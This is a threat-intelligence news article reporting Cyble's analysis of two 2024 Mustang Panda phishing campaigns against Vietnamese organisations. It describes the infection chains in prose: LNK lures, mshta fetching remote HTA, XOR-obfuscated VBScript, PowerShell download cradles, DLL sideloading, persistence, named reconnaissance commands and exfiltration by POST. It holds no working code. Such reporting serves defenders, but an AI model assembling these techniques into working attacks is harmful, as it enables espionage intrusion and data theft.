Mustang Panda's LNK File Lures in A New Wave of Tax Compliance Scams

A series of cyber espionage campaigns linked to the Chinese threat group Mustang Panda (aka, BRONZE PRESIDENT, Earth Preta, RedDelta, Stately Taurus, TA416, UAC-0084), were active in April and May 2024, have been unveiled by Cyble Research and Intelligence Labs. The group's activities particularly targeted organizations in Vietnam’s education and financial tax compliance sectors. These campaigns were first identified in April 2024, with subsequent actions traced through May 2024. During these periods, researchers observed two campaigns affecting the Vietnamese region, both initiated by distributing phishing emails containing archive files. These archives included LNK files with double-file extensions to masquerade as legitimate documents. "Based on the network infrastructure used in the May 2024 campaign, we identified another campaign from April 2024, which used lures to target entities interested in the education sector," shared Cyble researchers.

In the campaign occurring in May 2024, Mustang Panda employed a malicious LNK file disguised as a PDF through the double-file extension technique. This file execution leverages the forfiles utility to check for the presence of files within the “C:\Windows\Vss” directory before utilizing PowerShell and the mshta application to execute a remotely hosted HTA file. "This HTA file includes an obfuscated string element that the VBScript deobfuscates and executes using wscript. The deobfuscation process involves manipulating characters by taking their ASCII values, XORing them with 1, and converting them back to the original characters," as examined by Cyble. The analysis of the VBScript reveals that the wscript process calls PowerShell to execute a remote PowerShell script utilizing the Invoke-Expression cmdlet. These scripts facilitate the download of additional EXE and DLL payloads to enable DLL sideloading and establish persistence through registry modifications by adding itself to the Run key.

A similar pattern was observed in the April 2024 campaign, where the initial infection vector was also a double-extension LNK file. This campaign involved a different approach by downloading a Word document paired with the execution of a PowerShell script, which subsequently retrieved additional malicious PowerShell and batch scripts. The batch script was copied into the startup folder and downloaded additional PowerShell scripts—one focused on gathering system information (systeminfo), network information (netstat and netview), account and domain information (whoami, net group “domain admins” /domain), and gathers Desktop information with Get-ChildItem and gains context on security products with Get-WmiObject. These reconnaissance commands were exfiltrated via a POST request to the attacker's control infrastructure. Another PowerShell script downloads an executable and two DLL payloads executed with rundll32 for sideloading for the executable file identified as a "legitimate executable renamed from 'WinWord.exe'."

The command-and-control (C2) infrastructure utilized by Mustang Panda across these campaigns was consistent, indicating a well-established network designed to stage exfiltrated data and execute remote commands. The techniques demonstrated in the latest campaigns of Mustang Panda, as detailed by Cyble, help to provide insights into the threat actor's tactics, techniques, and procedures (TTPs) favored and utilized for their state-affiliated cyber espionage attacks. The group's strategic use of social engineering, combined with technical tactics, is vital not only for organizations in-scope of the active campaign but also for tracking Mustang Panda's activities. Historically, Mustang Panda has targeted organizations associated with defense, government, non-government organizations (NGOs), nonprofits, and religious organizations.